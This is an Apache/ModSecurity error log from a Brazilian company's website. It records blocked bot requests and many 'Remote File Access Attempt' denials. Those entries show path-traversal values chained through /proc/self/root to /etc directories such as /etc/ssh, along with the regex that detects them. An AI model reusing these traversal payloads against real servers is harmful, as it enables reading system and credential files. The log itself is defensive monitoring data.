[Tue Mar 17 17:34:45.329117 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.244.43:42712] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm65XIk7brgkOH-rIWhVQAAAUs"]
[Tue Mar 17 17:34:52.839764 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:54336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm67PPqhzTj3BvfDX-cTgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:34:58.361628 2026] [mime_magic:error] [pid 2473:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:60988] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr
[Tue Mar 17 17:34:58.440068 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.228.61:60174] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm68qBJNF7axNlVR0UtZgAAABA"]
[Tue Mar 17 17:35:02.917228 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.31:32772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm69qBJNF7axNlVR0UtbQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:35:06.141776 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41496] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:35:06.227936 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:32774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm6-hj0p0SRWAqcjGGOlQAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:35:10.350658 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:34278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm6_qBJNF7axNlVR0UtcwAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:35:28.126445 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:35:50.129779 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:35:51.438818 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:34284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm7Jxj0p0SRWAqcjGGOuwAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:35:54.831841 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:34284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm7Khj0p0SRWAqcjGGOwQAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:36:11.118199 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:36:20.774729 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:39610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm7RPPqhzTj3BvfDX-cZQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:36:34.129786 2026] [proxy_fcgi:error] [pid 25836:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:36:38.435616 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:34416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm7Vta6ubjKNq_cu4YcsQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:36:38.643141 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:34416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm7Vta6ubjKNq_cu4YcsgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:36:56.129800 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42576] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:37:22.125793 2026] [proxy_fcgi:error] [pid 7004:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42768] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:37:45.125865 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43008] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:38:15.125828 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43394] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:38:17.506477 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.128:45966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm7uKBJNF7axNlVR0UtmgAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:38:46.121800 2026] [proxy_fcgi:error] [pid 25836:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43904] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:39:08.133783 2026] [proxy_fcgi:error] [pid 7437:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44314] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:39:30.033992 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:39:52.025810 2026] [proxy_fcgi:error] [pid 7004:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:39:53.607940 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.244.43:48956] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm8GXIk7brgkOH-rIWhtQAAAUU"]
[Tue Mar 17 17:39:59.027137 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.228.61:52952] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm8H_PqhzTj3BvfDX-cjAAAAcc"]
[Tue Mar 17 17:40:05.922799 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.243.128:50660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8JXIk7brgkOH-rIWhvAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:40:14.121802 2026] [proxy_fcgi:error] [pid 7437:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45134] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:40:36.118390 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45364] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:40:58.121782 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:41:20.129868 2026] [proxy_fcgi:error] [pid 6296:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:41:41.091374 2026] [:error] [pid 31803:tid 140411574073088] [client 216.73.216.191:35663] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8heyqAr6etmhZHNo8QgAAAFQ"]
[Tue Mar 17 17:41:41.969344 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.243.128:50660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8hXIk7brgkOH-rIWh4gAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:41:42.126829 2026] [proxy_fcgi:error] [pid 7437:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46152] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:41:44.230792 2026] [:error] [pid 2598:tid 140411548894976] [client 216.73.216.191:14041] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8hxj0p0SRWAqcjGGPTAAAAxc"]
[Tue Mar 17 17:41:44.231683 2026] [:error] [pid 19507:tid 140411557287680] [client 216.73.216.191:14797] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8h9Y0UrI5A3LftIwSnwAAAZY"]
[Tue Mar 17 17:41:45.198333 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:34186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8ieyqAr6etmhZHNo8RgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:41:46.905306 2026] [:error] [pid 2473:tid 140411540502272] [client 216.73.216.191:28490] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8iqBJNF7axNlVR0UtyAAAABg"]
[Tue Mar 17 17:42:00.932294 2026] [:error] [pid 2473:tid 140411733534464] [client 216.73.216.191:29734] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8mKBJNF7axNlVR0Ut0QAAAAE"]
[Tue Mar 17 17:42:01.503036 2026] [:error] [pid 19507:tid 140411649607424] [client 216.73.216.191:60146] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8mdY0UrI5A3LftIwSpQAAAYs"]
